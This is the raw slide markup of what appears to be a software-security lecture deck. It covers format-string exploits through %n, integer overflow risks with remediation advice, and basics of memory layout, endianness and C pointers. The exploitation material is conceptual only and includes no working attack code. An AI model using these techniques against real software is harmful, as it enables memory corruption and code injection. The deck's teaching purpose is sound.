            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395" name="Google Shape;395;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546525" y="2878600"/>
            <a:ext cx="4179000" cy="18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va_list pointer points to optional arguments. It starts right after the format string. The format string specifies the number of optional arguments using the number of format specifiers.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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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02" name="Google Shape;402;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="375775" y="875750"/>
            <a:ext cx="4476750" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="403" name="Google Shape;403;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4796113" y="1264925"/>
            <a:ext cx="3705225" cy="29146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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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 %n to modify memory data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Change to a specific value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And even inject malicious code </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="410" name="Google Shape;410;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="562175" y="2064600"/>
            <a:ext cx="6400800" cy="2381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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Integer Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Integer overflows, underflows, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>arithmetic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> overflows, float pointing errors can be exploited to cause crashes, logic errors, or even escalation of privilege and execution of arbitrary code. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Affect all common languages and can cause more damage on C/C++.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Understand how the numbers are represented in binary and how arithmetic operations cast different types</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Byte, short, int, long, long long, unsigned, signed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Upcast or downcast when using operators such as +, - *, /, %, &lt;, &gt;, = |, &amp;, ^, ~  ? In particular, cast between signed and unsigned can be dangerous</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>32 bits or 64 bits architecture</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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Dangerous cases:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory allocation based on your calculation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Array indexing, array offset, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pointers calculation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Catch integer exceptions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Redemption Steps:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do right math</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Don’t use tricks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> out casts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use safeint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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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From the textbook “24 deadly sins”.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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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434" name="Google Shape;434;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="369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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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80" name="Google Shape;80;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C programming language (particularly on pointer)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Memory layout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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="156000" y="7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details about architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="329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Memory address and value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Binary, hexadecimal, and decimal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>35  = 0X23 = 0B 00100011</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Bits, Bytes, and address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>1 byte = 8 bits (2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hexadecimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> digits) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>32 bits vs 64 bits architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Little endian vs big endian</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Little endian: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The least significant byte (the "little end") of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Big endian: The most significant byte (the "big end") of the data is placed at the byte with the lowest address. The rest of the data is placed in order in the next three bytes in memory.</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87" name="Google Shape;87;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010350" y="4652150"/>
            <a:ext cx="2951400" cy="28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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>little endian: 0x 10 3f 00 40</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p19"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="89" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1978150" y="4544675"/>
            <a:ext cx="3050400" cy="32100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2010350" y="4168075"/>
            <a:ext cx="2951400" cy="28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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>big endian: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x 00 40 10 3f</a:t>
            </a:r>
            <a:endParaRPr sz="1700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1037250" y="4396400"/>
            <a:ext cx="118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Low addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5028550" y="4344575"/>
            <a:ext cx="118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high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215650" y="4187050"/>
            <a:ext cx="1879200" cy="74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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x 00 40 10 3f </a:t>
            </a:r>
            <a:endParaRPr sz="17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700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4198463</a:t>
            </a:r>
            <a:endParaRPr sz="17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156000" y="7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 Programming Basics</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Google Shape;98;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="875750"/>
            <a:ext cx="8520600" cy="3693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Pointers and addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>int a, *b;   a = 3; b = &amp;a; a++;   b?  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Type cast</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>unsigned int c = (signed int) b</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>char *str = “string”;  int len = strlen(str);  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Printing format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>printf(“ %d %x %p %s \n” x, y, z, b);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6544325" y="1049900"/>
            <a:ext cx="1994400" cy="89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04</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556350" y="2312400"/>
            <a:ext cx="1292700" cy="36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0x238459e0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6710650" y="649700"/>
            <a:ext cx="54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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
